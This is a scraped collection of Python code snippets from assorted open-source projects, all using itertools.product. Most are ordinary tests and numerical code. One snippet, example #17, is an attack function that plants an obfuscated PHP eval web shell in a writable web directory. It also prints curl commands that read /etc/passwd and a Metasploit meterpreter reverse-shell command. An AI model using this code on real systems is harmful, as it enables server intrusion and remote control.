def resolve(self):
        # Create a set with all the possible keys using the guess with the lowest score...
        self.__guesses = sorted(self.__guesses, key=lambda guess: guess[len(guess) - 1])

        # First of all check if is possible comparing the matches between the keys, is
        # the fastest method that can define if is not possible
        if not self.__checkIfPossibleByPairs():
            return "No"

        # Get the posible keys, mainKeys will be the keys with most posibilities to match
        # because of they include all the numbersincluded into the different guesses, and
        # possibleKeys the rest of posible keys with the numbers that can't be discarted
        mainKeys, possibleKeys = self.__createPossibleKeys(self.__guesses)

        # Check the keys with most posibilities
        for key in itertools.product(*mainKeys):
            if self.__checkIfPossibleWithGuesses(key):
                return "Yes"

        # Check the rest, this is the brute force  method :'(
        for key in itertools.product(*possibleKeys):
            if self.__checkIfPossibleWithGuesses(key):
                return "Yes"

        # No key matches, no hope left :'(
        return "No"
예제 #2
0
def _generate_cmdline_tests():
    """Generate testcases for test_split_binding."""
    # pylint: disable=invalid-name
    TestCase = collections.namedtuple('TestCase', 'cmd, valid')
    separators = [';;', ' ;; ', ';; ', ' ;;']
    invalid = ['foo', '']
    valid = ['leave-mode', 'hint all']
    # Valid command only -> valid
    for item in valid:
        yield TestCase(''.join(item), True)
    # Invalid command only -> invalid
    for item in invalid:
        yield TestCase(''.join(item), False)
    # Invalid command combined with invalid command -> invalid
    for item in itertools.product(invalid, separators, invalid):
        yield TestCase(''.join(item), False)
    # Valid command combined with valid command -> valid
    for item in itertools.product(valid, separators, valid):
        yield TestCase(''.join(item), True)
    # Valid command combined with invalid command -> invalid
    for item in itertools.product(valid, separators, invalid):
        yield TestCase(''.join(item), False)
    # Invalid command combined with valid command -> invalid
    for item in itertools.product(invalid, separators, valid):
        yield TestCase(''.join(item), False)
    # Command with no_cmd_split combined with an "invalid" command -> valid
    for item in itertools.product(['bind x open'], separators, invalid):
        yield TestCase(''.join(item), True)
예제 #3
0
def p_player_skill_given_data(player, skill):
    bingame_outcomes = itertools.product(OUTCOMES, repeat=N_GAME_TYPES)
    other_player_skills = itertools.product(SKILLS, repeat=N_PLAYERS - 1)
    all = itertools.product(bingame_outcomes, other_player_skills)

    def player_a_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s, s_b, s_c, s_d))
                   for outcomes, (s_b, s_c, s_d) in all)

    def player_b_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s_a, s, s_c, s_d))
                   for outcomes, (s_a, s_c, s_d) in all)

    def player_c_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s_a, s_b, s, s_d))
                   for outcomes, (s_a, s_b, s_d) in all)

    def player_d_skill_and_data(s):
        return sum(p_skill_and_data(outcomes, (s_a, s_b, s_c, s))
                   for outcomes, (s_a, s_b, s_c) in all)

    if player == PLAYER_A:
        return player_a_skill_and_data(skill) / P_DATA
    elif player == PLAYER_B:
        return player_b_skill_and_data(skill) / P_DATA
    elif player == PLAYER_C:
        return player_c_skill_and_data(skill) / P_DATA
    elif player == PLAYER_D:
        return player_d_skill_and_data(skill) / P_DATA
    else:
        return 0
예제 #4
0
파일: test_loc.py 프로젝트: bwignall/pandas
    def test_loc_getitem_int_slice(self):
        # GH 3053
        # loc should treat integer slices like label slices

        index = MultiIndex.from_tuples([t for t in itertools.product(
            [6, 7, 8], ['a', 'b'])])
        df = DataFrame(np.random.randn(6, 6), index, index)
        result = df.loc[6:8, :]
        expected = df
        tm.assert_frame_equal(result, expected)

        index = MultiIndex.from_tuples([t
                                        for t in itertools.product(
                                            [10, 20, 30], ['a', 'b'])])
        df = DataFrame(np.random.randn(6, 6), index, index)
        result = df.loc[20:30, :]
        expected = df.iloc[2:]
        tm.assert_frame_equal(result, expected)

        # doc examples
        result = df.loc[10, :]
        expected = df.iloc[0:2]
        expected.index = ['a', 'b']
        tm.assert_frame_equal(result, expected)

        result = df.loc[:, 10]
        expected = df[10]
        tm.assert_frame_equal(result, expected)
예제 #5
0
    def get_similarity(self, string1, string2):
        """
        Calculate the similarity of two statements.
        This is based on the total similarity between
        each word in each sentence.
        """
        import itertools

        tokens1 = self.get_tokens(string1)
        tokens2 = self.get_tokens(string2)

        total_similarity = 0

        # Get the highest matching value for each possible combination of words
        for combination in itertools.product(*[tokens1, tokens2]):

            synset1 = self.wordnet.synsets(combination[0])
            synset2 = self.wordnet.synsets(combination[1])

            if synset1 and synset2:

                max_similarity = 0

                # Get the highest similarity for each combination of synsets
                for synset in itertools.product(*[synset1, synset2]):
                    similarity = synset[0].path_similarity(synset[1])

                    if similarity and (similarity > max_similarity):
                        max_similarity = similarity

                # Add the most similar path value to the total
                total_similarity += max_similarity

        return total_similarity
예제 #6
0
 def test_header_scaling(self):
     # For images that implement scaling, test effect of scaling
     #
     # This tests the affect of creating an image with a header containing
     # the scaling, then writing the image and reading again.  So the scaling
     # can be affected by the processing of the header when creating the
     # image, or by interpretation of the scaling when creating the array.
     #
     # Analyze does not implement any scaling, but this test class is the
     # base class for all Analyze-derived classes, such as NIfTI
     img_class = self.image_class
     hdr_class = img_class.header_class
     if not hdr_class.has_data_slope:
         return
     arr = np.arange(24, dtype=np.int16).reshape((2, 3, 4))
     invalid_slopes = (0, np.nan, np.inf, -np.inf)
     for slope in (1,) + invalid_slopes:
         self.assert_null_scaling(arr, slope, None)
     if not hdr_class.has_data_intercept:
         return
     invalid_inters = (np.nan, np.inf, -np.inf)
     invalid_pairs = tuple(itertools.product(invalid_slopes, invalid_inters))
     bad_slopes_good_inter = tuple(itertools.product(invalid_slopes, (0, 1)))
     good_slope_bad_inters = tuple(itertools.product((1, 2), invalid_inters))
     for slope, inter in (invalid_pairs + bad_slopes_good_inter +
                          good_slope_bad_inters):
         self.assert_null_scaling(arr, slope, inter)
예제 #7
0
def Process():
    
    for thisXConfiguration in product(range(MAX_X_CARDINALITY), repeat = BASE_CYCLE_SIZE):
        
        baseGraph = make_cycle(7)
        baseGraph, x_sets = ConstructGraph(thisXConfiguration, baseGraph)
        thisGraph = deepcopy(baseGraph)
        print(thisGraph.edges())
        #Try all possible combos of X and X_i+2 edges
        for xSetIndex in range(0,BASE_CYCLE_SIZE):
            s1 = x_sets[xSetIndex]
            s2 = x_sets[(xSetIndex + 2) % BASE_CYCLE_SIZE]
        
            for i in range(0,4):
                for thisEdgeCombo in combinations(product(s1,s2),i):
                    for thisEdge in thisEdgeCombo:
                        thisGraph.add_edge(thisEdge[0], thisEdge[1])      
                         
                    WriteToLogFile(FinalProcessGraph(thisGraph))
                
                    #for each of these combos, try it with all combos of X and X_i+5
                    thisGraphMoreJoins = deepcopy(thisGraph)
                    s1 = x_sets[xSetIndex]
                    s2 = x_sets[(xSetIndex + 5) % BASE_CYCLE_SIZE]
                    for i in range(0,4):
                        for thisEdgeCombo in combinations(product(s1,s2),i):
                            for thisEdge in thisEdgeCombo:
                                thisGraphMoreJoins.add_edge(thisEdge[0], thisEdge[1])      
                             
                            WriteToLogFile(FinalProcessGraph(thisGraphMoreJoins))
                    
                thisGraph = deepcopy(baseGraph)
                
        baseGraph.clear()
    return
예제 #8
0
파일: models.py 프로젝트: plopp/friendlysam
    def advance(self):
        if self.horizon < self.step:
            msg = '{}: horizon {} is smaller than step size {}'.format(
                repr(self),
                self.horizon,
                self.step)
            raise fs.InsanityError()

        opt_times = self.times(self.time, self.horizon)

        parts = self.descendants_and_self

        if self.require_cost is True:
            cost_contributors = parts
        else:
            cost_contributors = filter(self.require_cost, parts)
        system_cost = fs.Sum(p.cost(t) for p, t in product(cost_contributors, opt_times))

        problem = fs.Problem()
        problem.objective = fs.Minimize(system_cost)
        problem += (p.constraints.make(t) for p, t in product(parts, opt_times))

        solution = self.solver.solve(problem)

        for p, t in product(parts, self.iter_times(self.time, self.step)):
            for v in p.state_variables(t):
                v.take_value(solution)

        self.time = self.step_time(self.time, self.step)
예제 #9
0
def getThresholdColor(img2):
	img=img2.copy()
	XX=8
	YY=int(XX*float(img.size[1])/float(img.size[0]))
	img.thumbnail((XX,YY),Image.ANTIALIAS)
	img=img.convert('LA')
	pixels=img.load()
	thres=np.zeros((2,2))
	lst1=[pixels[i,j][0] for (i,j) in itertools.product(range(XX/2),range(YY/2)) ]
	lst2=[pixels[i,j][0] for (i,j) in itertools.product(range(XX/2,XX),range(YY/2)) ]
	lst3=[pixels[i,j][0] for (i,j) in itertools.product(range(XX/2),range(YY/2,YY)) ]
	lst4=[pixels[i,j][0] for (i,j) in itertools.product(range(XX/2,XX),range(YY/2,YY)) ]

	thres[0,0]=(max(lst1)-min(lst1))/10.0+2.0
	thres[1,0]=(max(lst2)-min(lst2))/10.0+2.0
	thres[0,1]=(max(lst3)-min(lst3))/10.0+2.0
	thres[1,1]=(max(lst4)-min(lst4))/10.0+2.0
	
	"""
	lst=[pixels[i,j][0] for (i,j) in itertools.product(range(XX/2),range(YY/2)) ]
	thr=(max(lst)-min(lst))/10.0
	thres[0,0]=thr
	thres[0,1]=thr
	thres[1,0]=thr
	thres[1,1]=thr
	"""
	return thres
예제 #10
0
파일: physics.py 프로젝트: RyanED/bravo
    def add_sponge(self, w, x, y, z):
        # Track this sponge.
        self.sponges[x, y, z] = True

        # Destroy the water! Destroy!
        for coords in product(
            xrange(x - 2, x + 3),
            xrange(max(y - 2, 0), min(y + 3, 128)),
            xrange(z - 2, z + 3),
            ):
            try:
                target = w.sync_get_block(coords)
                if target == self.spring:
                    if (coords[0], coords[2]) in self.springs:
                        del self.springs[coords[0],
                            coords[2]]
                    w.sync_destroy(coords)
                elif target == self.fluid:
                    w.sync_destroy(coords)
            except ChunkNotLoaded:
                pass

        # And now mark our surroundings so that they can be
        # updated appropriately.
        for coords in product(
            xrange(x - 3, x + 4),
            xrange(max(y - 3, 0), min(y + 4, 128)),
            xrange(z - 3, z + 4),
            ):
            if coords != (x, y, z):
                self.new.add(coords)
예제 #11
0
    def __sample__(self):
        """
        Assigns colors to the population of graphs.
        """
        sample = dict()
        children = list(itertools.product(self.dependencies[None], [None]))

        while len(children) > 0:
            # current[1] is the parent; current[0] is the child
            current = children[0]  # first child in the list

            probs = []
            if current[1] not in sample:
                for color in self.palette:
                    probs.append(self._bbn_functions[current[0]](color))
            else:
                _product = itertools.product(self.palette, sample[current[1]])
                raise NameError('implement me!')

            sample[current[0]] = np.random.choice(self.palette, size=self.population_size, replace=True, p=probs)
            children.remove(current)

        # rotates the dictionary
        sample = TreeMIMIC.__rotate_dict__(sample, dict_to_list=True)

        for graph, colors in itertools.izip(self.population, sample):
            graph.colors = colors
예제 #12
0
 def translations(self, hft):
   """ Array of permutations arising from pure translations """
   from itertools import product
   from numpy import zeros
   nsites = len(self.dnt[0])
   itertrans = [ xrange(hft.quotient[0]), 
                 xrange(hft.quotient[1]), 
                 xrange(hft.quotient[2]) ] 
   size = hft.size
   result = zeros((size-1, nsites * size), dtype='int16')  - 1
   iterable = product(*itertrans)
   a = iterable.next() # avoid null translation
   assert a == (0,0,0) # check that it is null
   for t, (i,j,k) in enumerate(iterable):
     iterpos = [ xrange(hft.quotient[0]), 
                 xrange(hft.quotient[1]), 
                 xrange(hft.quotient[2]) ] 
     for l, m, n in product(*iterpos):
       u = (i+l) % hft.quotient[0]
       v = (j+m) % hft.quotient[1]
       w = (k+n) % hft.quotient[2]
       for s in xrange(nsites):
         result[t, hft.flatten_indices(l, m, n, s)]                           \
             = hft.flatten_indices(u, v, w, s)
   return result
예제 #13
0
    def entropy(self, n, p):
        # Note that given n and p where p is a probability vector of
        # length k, the entropy requires a sum over all
        # possible configurations of a k-vector which sums to n. It's
        # expensive.
        # http://stackoverflow.com/questions/36435754/generating-a-numpy-array-with-all-combinations-of-numbers-that-sum-to-less-than
        sess = tf.Session()
        n = sess.run(tf.cast(tf.squeeze(n), dtype=tf.int32))
        sess.close()
        p = tf.cast(tf.squeeze(p), dtype=tf.float32)
        if isinstance(n, np.int32):
            k = get_dims(p)[0]
            max_range = np.zeros(k, dtype=np.int32) + n
            x = np.array([i for i in product(*(range(i+1) for i in max_range))
                                 if sum(i)==n])
            logpmf = self.logpmf(x, n, p)
            return tf.reduce_sum(tf.mul(tf.exp(logpmf), logpmf))
        else:
            out = []
            for j in range(n.shape[0]):
                k = get_dims(p)[0]
                max_range = np.zeros(k, dtype=np.int32) + n[j]
                x = np.array([i for i in product(*(range(i+1) for i in max_range))
                                     if sum(i)==n[j]])
                logpmf = self.logpmf(x, n[j], p[j, :])
                out += [tf.reduce_sum(tf.mul(tf.exp(logpmf), logpmf))]

            return tf.pack(out)
def main():
    """ Generate tests """
    dirname = os.path.join('spec', 'glsl-1.20', 'execution')
    utils.safe_makedirs(dirname)


    for c, r in itertools.product(range(2, 5), repeat=2):
        vecs = [
            Parameters(c, r, 'vec', 'mat{0}x{1}'.format(r, c)),
            Parameters(c, r, 'ivec', 'mat{0}x{1}'.format(r, c))
        ]
        if r == c:
            vecs.extend([
                Parameters(c, r, 'vec', 'mat{0}'.format(r)),
                Parameters(c, r, 'ivec', 'mat{0}'.format(r))
            ])

        stages = ['vs', 'fs']
        types = ['const', 'uniform']
        for shader, type_, params in itertools.product(stages, types, vecs):
            name = os.path.join(
                dirname,
                '{shader}-outerProduct-{type}{mat}{vec}.shader_test'.format(
                    shader=shader,
                    type='const-' if type_ == 'const' else '',
                    mat=params.matrix,
                    vec='-ivec' if params.vec_type == 'ivec' else ''))

            print(name)
            with open(name, 'w+') as f:
                f.write(TEMPLATE.render_unicode(params=params,
                                                type=type_,
                                                shader=shader))
예제 #15
0
def answer(matrix):
    n = len(matrix)
    if n % 2 == 0:
        rev = [[0] * n for i in range(n)]
        for i,j in product(range(n),repeat=2):
            if matrix[i][j]:
                for k in range(n):
                    rev[k][j] = rev[k][j] ^ 1
                    rev[i][k] = rev[i][k] ^ 1
                rev[i][j] = rev[i][j] ^ 1
        return sum([sum(row) for row in rev])
    elif validate(matrix):
        condition = True
        for i,j in product(range(n),repeat=2):
            if i == j or i == n - 1 or j == n - 1:
               if matrix[i][j] == 0:
                   condition = False
                   break
            elif matrix[i][j]:
                condition = False
                break
        if condition:
            return n
        return sum([sum(row) for row in matrix])
    else:
        return -1
예제 #16
0
    def test_slice_passing(self):
        """
        Check passing a slice object to a Numba function.
        """
        # NOTE this also checks slice attributes
        def check(a, b, c, d, e, f):
            sl = slice(a, b, c)
            got = cfunc(sl)
            self.assertPreciseEqual(got, (d, e, f))

        maxposint = sys.maxsize
        maxnegint = -maxposint - 1
        cfunc = jit(nopython=True)(slice_passing)

        # Positive steps
        start_cases = [(None, 0), (42, 42), (-1, -1)]
        stop_cases = [(None, maxposint), (9, 9), (-11, -11)]
        step_cases = [(None, 1), (12, 12)]
        for (a, d), (b, e), (c, f) in itertools.product(start_cases,
                                                        stop_cases,
                                                        step_cases):
            check(a, b, c, d, e, f)

        # Negative steps
        start_cases = [(None, 0), (42, 42), (-1, -1)]
        stop_cases = [(None, maxnegint), (9, 9), (-11, -11)]
        step_cases = [(-1, -1), (-12, -12)]
        for (a, d), (b, e), (c, f) in itertools.product(start_cases,
                                                        stop_cases,
                                                        step_cases):
            check(a, b, c, d, e, f)

        # Some member is neither integer nor None
        with self.assertRaises(TypeError):
            cfunc(slice(1.5, 1, 1))
예제 #17
0
    def php(self, ip, ourIP):
        wwwroot = linux.get_doc_root()
        cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot)
        folder = make_request.get_page_source(cmd)
        if folder:
            folder = folder[0]
            cprint('\n[+] Found a writable directory: \'{1}\''.format(folder), 'green')
            filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php'
            cprint('[+] Filename: \'{1}\''.format(filename), 'green')
            location = '{0}/{1}'.format(folder, filename)

            cmd = 'find {0} -type f -print'.format(wwwroot)
            files = make_request.get_page_source(cmd)
            cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green')
            cprint(' 0.) Don\'t close - create new', 'green')
            path = []
            c = 0
            for file in files:
                path.append(file)
                c += 1
                cprint('{0:2d}.) {1}'.format(c, file), 'green')
            while True:
                try:
                    clone = int(raw_input(colored('[>] Which file to use? [0-{0}: '.format(c))))
                    if 0 <= clone <= c:
                        break
                except ValueError:
                    pass

            if clone != 0:
                cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location)
                make_request.get_page_source(cmd)
            cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green')
            parameter = ''.join(choice(string.ascii_lowercase) for x in range(6))
            casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval'))))
            caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode'))))
            payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter)
            payloadEncoded = b64encode(payload).format(payload)
            evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded)
            cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location)
            make_request.get_page_source(cmd)
            cprint('[+] Done!', 'blue')
            uri = folder[len(wwwroot):]

            #>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3])
            #'https://localhost'
            url = '/'.join(getargs.url.split('/', 3)[:3])
            example = """Example:
            curl "{url}{uri}/{filename}?{parameter}=phpinfo()"
            curl "{url}{uri}/{filename}?{parameter}=require(\'/etc/passwd\')"
            curl "{url}{uri}/{filename}?{parameter}=system(\'/sbin/ifconfig\')"
            msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/{filename}?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format(
                    url=url,
                    uri=uri,
                    filename=filename,
                    parameter=parameter,
                    ourIP=ourIP,)
            cprint(example, 'green')
        else:
            cprint('\n[!] Unable to find a writable directory', 'red')
예제 #18
0
 def _annotate_values(self, element):
     axis = self.handles['axis']
     val_dim = element.vdims[0]
     d1keys, d2keys = element.dense_keys()
     vals = np.rot90(element.raster, 3).flatten()
     d1uniq, d2uniq = [np.unique(element.dimension_values(i)) for i in range(2)]
     num_x, num_y = len(d1uniq), len(d2uniq)
     xstep, ystep = 1.0/num_x, 1.0/num_y
     xpos = np.linspace(xstep/2., 1.0-xstep/2., num_x)
     ypos = np.linspace(ystep/2., 1.0-ystep/2., num_y)
     plot_coords = product(xpos, ypos)
     for plot_coord, v in zip(plot_coords, vals):
         text = val_dim.pprint_value(v)
         text = '' if v is np.nan else text
         if plot_coord not in self.handles['annotations']:
             annotation = axis.annotate(text, xy=plot_coord,
                                        xycoords='axes fraction',
                                        horizontalalignment='center',
                                        verticalalignment='center')
             self.handles['annotations'][plot_coord] = annotation
         else:
             self.handles['annotations'][plot_coord].set_text(text)
     old_coords = set(self.handles['annotations'].keys()) - set(product(xpos, ypos))
     for plot_coord in old_coords:
         annotation = self.handles['annotations'].pop(plot_coord)
         annotation.remove()
예제 #19
0
    def test_pdist(self):
        for metric, argdict in self.scipy_metrics.iteritems():
            keys = argdict.keys()
            for vals in itertools.product(*argdict.values()):
                kwargs = dict(zip(keys, vals))
                D_true = pdist(self.X1, metric, **kwargs)
                Dsq_true = squareform(D_true)
                dm = DistanceMetric(metric, **kwargs)
                for X in self.X1, self.spX1:
                    yield self.check_pdist, metric, X, dm, Dsq_true, True

                for X in self.X1, self.spX1:
                    yield self.check_pdist, metric, X, dm, D_true, False

        for rmetric, (metric, func) in self.reduced_metrics.iteritems():
            argdict = self.scipy_metrics[metric]
            keys = argdict.keys()
            for vals in itertools.product(*argdict.values()):
                kwargs = dict(zip(keys, vals))
                D_true = func(pdist(self.X1, metric, **kwargs),
                              **kwargs)
                Dsq_true = squareform(D_true)
                dm = DistanceMetric(rmetric, **kwargs)
                for X in self.X1, self.spX1:
                    yield self.check_pdist, rmetric, X, dm, Dsq_true, True

                for X in self.X1, self.spX1:
                    yield self.check_pdist, rmetric, X, dm, D_true, False
def test_state_reconciliation_no_ops():
  # active vs. active
  for st0, st1 in product(THERMOS_LIVES, LIVE_STATES):
    tgc, driver = make_pair({'foo': st0}, {})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)

  # terminal vs. terminal
  for st0, st1 in product(THERMOS_TERMINALS, TERMINAL_STATES):
    tgc, driver = make_pair({}, {'foo': st0})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)

  # active vs. starting
  for st0, st1 in product(THERMOS_LIVES, STARTING_STATES):
    tgc, driver = make_pair({'foo': st0}, {})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)

  # nexist vs. starting
  for st1 in STARTING_STATES:
    tgc, driver = make_pair({}, {})
    lgc, rgc, updates = tgc.reconcile_states(driver, {'foo': st1})
    assert tgc.len_results == (0, 0, 0, 0)
    assert llen(lgc, rgc, updates) == (0, 0, 0)
예제 #21
0
    def test_integers_to_negative_integer_power(self):
        # Note that the combination of uint64 with a signed integer
        # has common type np.float64. The other combinations should all
        # raise a ValueError for integer ** negative integer.
        exp = [np.array(-1, dt)[()] for dt in 'bhilq']

        # 1 ** -1 possible special case
        base = [np.array(1, dt)[()] for dt in 'bhilqBHILQ']
        for i1, i2 in itertools.product(base, exp):
            if i1.dtype != np.uint64:
                assert_raises(ValueError, operator.pow, i1, i2)
            else:
                res = operator.pow(i1, i2)
                assert_(res.dtype.type is np.float64)
                assert_almost_equal(res, 1.)

        # -1 ** -1 possible special case
        base = [np.array(-1, dt)[()] for dt in 'bhilq']
        for i1, i2 in itertools.product(base, exp):
            if i1.dtype != np.uint64:
                assert_raises(ValueError, operator.pow, i1, i2)
            else:
                res = operator.pow(i1, i2)
                assert_(res.dtype.type is np.float64)
                assert_almost_equal(res, -1.)

        # 2 ** -1 perhaps generic
        base = [np.array(2, dt)[()] for dt in 'bhilqBHILQ']
        for i1, i2 in itertools.product(base, exp):
            if i1.dtype != np.uint64:
                assert_raises(ValueError, operator.pow, i1, i2)
            else:
                res = operator.pow(i1, i2)
                assert_(res.dtype.type is np.float64)
                assert_almost_equal(res, .5)
예제 #22
0
파일: sdsirec.py 프로젝트: Loveice/FPsolve
def gen_system_free() :
  #for all pairs i,j in rang

  #generate equation for all pairs of persons e.g. <Trust_A_B> ::= "AB" | <Trust_A_C> <Trust_C_B> | ...
  for i,j in itertools.product(range(len(persons)),repeat=2) :
    joinpairs = ["<Trust_" + persons[i] + "_" + persons[x] + ">" + " <Trust_" + persons[x] + "_" + persons[j] + "> " for x in range(len(persons))]
    body = ""
    if len(joinpairs) > 0 :
      body = reduce(lambda x,y: x + " | " + y, joinpairs if trust.has_key((i,j)) else joinpairs[1:], ('"' + persons[i]+ "-" + persons[j] + '"') if trust.has_key((i,j)) else joinpairs[0])
    else :
      body = ('"' + persons[i]+ "-" + persons[j] + '"') if trust.has_key((i,j)) else ""
    
    if body == "" :
      body = "0";

    eq = "<Trust_" + persons[i] + "_" + persons[j] + "> ::= " + body + ";"
    print eq

  for i,j in itertools.product(range(len(persons)),range(len(products))) :
    joinpairs = ["<Trust_" + persons[i] + "_" + persons[x] + ">" + " <Rec_" + persons[x] + "_" + products[j] + "> " for x in range(len(persons))]
    body = ""
    if len(joinpairs) > 0 :
      body = reduce(lambda x,y: x + " | " + y, joinpairs if rec.has_key((i,j)) else joinpairs[1:], ('"' + persons[i]+"-" +products[j] + '"') if rec.has_key((i,j)) else joinpairs[0])
    else :
      body = ('"' + persons[i]+ "-" +products[j] + '"') if rec.has_key((i,j)) else ""
    if body == "" :
      body = "0";

    eq = "<Rec_" + persons[i] + "_" + products[j] + "> ::= " + body + ";"
    print eq
예제 #23
0
파일: test_utils.py 프로젝트: nolta/numpy
    def test_nat_items(self):
        # not a datetime
        nadt_no_unit = np.datetime64("NaT")
        nadt_s = np.datetime64("NaT", "s")
        nadt_d = np.datetime64("NaT", "ns")
        # not a timedelta
        natd_no_unit = np.timedelta64("NaT")
        natd_s = np.timedelta64("NaT", "s")
        natd_d = np.timedelta64("NaT", "ns")

        dts = [nadt_no_unit, nadt_s, nadt_d]
        tds = [natd_no_unit, natd_s, natd_d]
        for a, b in itertools.product(dts, dts):
            self._assert_func(a, b)
            self._assert_func([a], [b])
            self._test_not_equal([a], b)

        for a, b in itertools.product(tds, tds):
            self._assert_func(a, b)
            self._assert_func([a], [b])
            self._test_not_equal([a], b)

        for a, b in itertools.product(tds, dts):
            self._test_not_equal(a, b)
            self._test_not_equal(a, [b])
            self._test_not_equal([a], [b])
            self._test_not_equal([a], np.datetime64("2017-01-01", "s"))
            self._test_not_equal([b], np.datetime64("2017-01-01", "s"))
            self._test_not_equal([a], np.timedelta64(123, "s"))
            self._test_not_equal([b], np.timedelta64(123, "s"))
예제 #24
0
def pytest_generate_tests(metafunc):
    bsz_rng = [1]

    if 'refgruargs' in metafunc.fixturenames:
        fargs = []
        if metafunc.config.option.all:
            seq_rng = [2, 3, 4]
            inp_rng = [3, 5, 10]
            out_rng = [3, 5, 10]
        else:
            seq_rng = [3]
            inp_rng = [5]
            out_rng = [10]
        fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
        metafunc.parametrize('refgruargs', fargs)

    if 'gradgruargs' in metafunc.fixturenames:
        fargs = []
        if metafunc.config.option.all:
            seq_rng = [2, 3]
            inp_rng = [5, 10]
            out_rng = [3, 5, 10]
        else:
            seq_rng = [3]
            inp_rng = [5]
            out_rng = [10]
        fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
        metafunc.parametrize('gradgruargs', fargs)
예제 #25
0
 def _annotate_values(self, view):
     axis = self.handles['axis']
     val_dim = view.value_dimensions[0]
     dim1_keys, dim2_keys = view.dense_keys()
     num_x, num_y = len(dim1_keys), len(dim2_keys)
     xstep, ystep = 1.0/num_x, 1.0/num_y
     xpos = np.linspace(xstep/2., 1.0-xstep/2., num_x)
     ypos = np.linspace(ystep/2., 1.0-ystep/2., num_y)
     coords = product(dim1_keys, dim2_keys)
     plot_coords = product(xpos, ypos)
     for plot_coord, coord in zip(plot_coords, coords):
         if isinstance(view, HeatMap):
             val = view._data.get(coord, np.NaN)
             val = val[0] if isinstance(val, tuple) else val
         else:
             val = view[coord]
         val = val_dim.type(val) if val_dim.type else val
         val = val[0] if isinstance(val, tuple) else val
         text = val_dim.pprint_value(val)
         text = '' if val is np.nan else text
         if plot_coord not in self.handles['annotations']:
             annotation = axis.annotate(text, xy=plot_coord,
                                        xycoords='axes fraction',
                                        horizontalalignment='center',
                                        verticalalignment='center')
             self.handles['annotations'][plot_coord] = annotation
         else:
             self.handles['annotations'][plot_coord].set_text(text)
     old_coords = set(self.handles['annotations'].keys()) - set(product(xpos, ypos))
     for plot_coord in old_coords:
         annotation = self.handles['annotations'].pop(plot_coord)
         annotation.remove()
예제 #26
0
    def add_pair_variables(self, items):
        """Add one variable per pair of items"""

        self.x = {}

        # -- gurobi --
        if self.solver == 'gurobi':

            import gurobipy as grb

            for I, J in itertools.product(items, repeat=2):
                self.x[I, J] = self.problem.addVar(vtype=grb.GRB.BINARY)

            self.problem.update()

        # -- pulp --
        if self.solver == 'pulp':

            import pulp

            for I, J in itertools.product(items, repeat=2):
                name = "%s / %s" % (I, J)
                self.x[I, J] = pulp.LpVariable(name, cat=pulp.constants.LpBinary)

        return self
예제 #27
0
파일: kern.py 프로젝트: Dalar/GPy
    def prod(self, other, tensor=False):
        """
        Multiply two kernels (either on the same space, or on the tensor product of the input space).

        :param other: the other kernel to be added
        :type other: GPy.kern
        :param tensor: whether or not to use the tensor space (default is false).
        :type tensor: bool

        """
        K1 = self.copy()
        K2 = other.copy()

        slices = []
        for sl1, sl2 in itertools.product(K1.input_slices, K2.input_slices):
            s1, s2 = [False] * K1.input_dim, [False] * K2.input_dim
            s1[sl1], s2[sl2] = [True], [True]
            slices += [s1 + s2]

        newkernparts = [prod(k1, k2, tensor) for k1, k2 in itertools.product(K1.parts, K2.parts)]

        if tensor:
            newkern = kern(K1.input_dim + K2.input_dim, newkernparts, slices)
        else:
            newkern = kern(K1.input_dim, newkernparts, slices)

        newkern._follow_constrains(K1, K2)
        return newkern
예제 #28
0
파일: blocking.py 프로젝트: derwiki/dedupe
    def createPredicateSet(self, disjunctive):

        # The set of simple predicates
        predicate_set = list(product(self.predicate_functions,
                                     self.fields))


        predicate_set.extend(product(self.tfidf_thresholds,
                                     self.fields))

        if disjunctive:
            disjunctive_predicates = list(combinations(predicate_set, 2))

            # filter out disjunctive predicates that operate on same
            # field
            disjunctive_predicates = [predicate for predicate
                                      in disjunctive_predicates
                                      if predicate[0][1]
                                      != predicate[1][1]]

            predicate_set = [(predicate, ) for predicate in
                             predicate_set]
            predicate_set.extend(disjunctive_predicates)
        else:

            predicate_set = [(predicate, ) for predicate in
                             predicate_set]

        return predicate_set
예제 #29
0
def score_candidate_rects(node, region):
    """
    Score candidate bin rects in node.

    Return a list of (score, i, j QRectF) list)

    """
    xs, xe, ys, ye = bindices(node, region)

    if node.contingencies.ndim == 3:
        c = node.contingencies
        # compute_chisqares expects classes in 1 dim
        chi_lr, chi_up = compute_chi_squares(
            c[xs: xe, ys: ye, :].swapaxes(1, 2).swapaxes(0, 1)
        )

        def max_chisq(i, j):
            def valid(i, j):
                return 0 <= i < chi_up.shape[0] and \
                       0 <= j < chi_lr.shape[1]

            return max(chi_lr[i, j] if valid(i, j) else 0,
                       chi_lr[i, j - 1] if valid(i, j - 1) else 0,
                       chi_up[i, j] if valid(i, j) else 0,
                       chi_up[i - 1, j] if valid(i - 1, j) else 0)

        return [(max_chisq(i - xs, j - ys), i, j,
                 QRectF(QPointF(node.xbins[i], node.ybins[j]),
